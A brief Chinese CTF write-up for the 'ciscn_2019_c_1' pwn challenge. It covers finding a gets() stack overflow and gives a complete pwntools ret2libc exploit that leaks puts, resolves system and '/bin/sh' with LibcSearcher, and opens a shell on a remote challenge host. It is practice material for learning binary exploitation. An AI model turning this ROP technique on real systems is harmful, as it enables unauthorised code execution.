首先基本操作:
先对文件进行checksec和file查看
然后使用ida进行静态分析,找到main函数后按F5观察伪代码
发现是一个加密程序
然后按shift+F12进行字符串的查找,发现没有 /bin/sh字符串,因此我们只能利用libcsearch库中的system函数来完成此题,可以对puts函数进行地址泄露。
对主函数中调用的函数进行查看,可以发现encrypt函数中有gets()函数,可以在这里进行栈溢出攻击
双击s查看字符串s所分配的内存大小可以发现,一共占50个字节
编写exe脚本进行攻击
from pwn import*
from LibcSearcher import*
content = 0
context(os='linux',arch='amd64',log_level='debug')
ret = 0x4006b9
elf = ELF('ciscn_2019_c_1')#用ELF格式打开文件
#显示文件信息
puts_plt = elf.plt["puts"] # 找到get函数的plt和got
puts_got = elf.got['puts']
main_addr = elf.symbols["main"]#main函数起始地址 让它返回到main函数,这样我们才可以再一次利用输入点构造rop
pop_rdi_ret = 0x400c83
#print(puts_plt)
#print(puts_got)
#print(main_addr)
#找到程序内函数在plt表和got表中的地址
p = remote('node4.buuoj.cn',27985) #链接远程
payload = b'\0' + b'a' * (0x50-1 + 8)#serltn()函数读取到\0结束读取字符串,此处用来跳出循环
payload = payload + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendlineafter('Input your choice!\n', '1')
p.sendlineafter('Input your Plaintext to be encrypted\n', payload)
p.recvline() #接收字符串Ciphertext
p.recvline() #加密后的密文
puts_addr = u64(p.recv(7)[:-1].ljust(8,b'\x00'))#接收程序返回的地址#lijust(8,‘\0’),不满8位的用0补足 此处的地址为程序泄露出的puts()函数的地址
#print(puts_addr) #找出puts的地址140519155866048
#print(payload)
libc = LibcSearcher('puts', puts_addr)#寻找puts函数到对应的libc版本 #利用LibcSearcher模块找到匹配的libc版本
libc_base = puts_addr - libc.dump('puts') #找出程序中函数到libcsearcher函数库的地址偏移量
#因为程序到libcsearcher函数库中的偏移量相同
system_addr = libc_base + libc.dump('system') #计算出system的在程序中的地址
binsh_addr = libc_base + libc.dump('str_bin_sh') #/bin/sh偏移
payload = b'\0' + b'a' * (0x50-1 + 8)
payload = payload + p64(ret) + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
p.sendlineafter('Input your choice!\n', '1')
p.sendlineafter('Input your Plaintext to be encrypted\n', payload)
p.interactive()
运行脚本,此处选择版本1
得到flag
纯新手,部分内容参考https://blog.csdn.net/weixin_45556441/article/details/115091036